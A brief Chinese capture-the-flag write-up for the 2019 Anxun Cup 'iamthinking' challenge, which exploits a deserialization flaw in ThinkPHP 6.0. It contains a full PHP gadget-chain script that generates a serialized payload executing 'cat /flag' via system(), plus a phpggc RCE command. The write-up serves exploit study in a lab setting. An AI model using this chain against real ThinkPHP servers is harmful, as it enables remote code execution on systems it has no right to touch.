[安洵杯2019]iamthinking

# [安洵杯 2019] iamthinking

#

dirsearch 搜集到 www.zip 文件：

发现是 thinkphp6.0 版本：

thinkphp6.0 有两个计较明显的漏洞：
一个文件上传：要开启 session（本题没开）

一个就是反序列化：本体有个 unserilize 函数

那就是反序列化了

php 脚本：

<?php
 
namespace think\model\concern;
 
trait Attribute
{
    private $data = ["key" => ["key1" => "cat /flag"]];
    private $withAttr = ["key"=>["key1"=>"system"]];
    protected $json = ["key"];
}
namespace think;
 
abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    protected $jsonAssoc;
    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->table = $obj;
        $this->jsonAssoc = true;
    }
}
 
namespace think\model;
 
use think\Model;
 
class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);
$c = array($b);
echo urlencode(serialize($c));

phpgcc 好像搞不了（首字母不能是 O，在

./phpggc -u ThinkPHP/RCE2 'system("cat /flag");'

出来的时候是 O 开头）

仔细的反序列化过程：https://xz.aliyun.com/t/6479?u_atoken=e1983cca7115bb73dc8261395f38e428&u_asig=1a0c399a17270782535993477e0035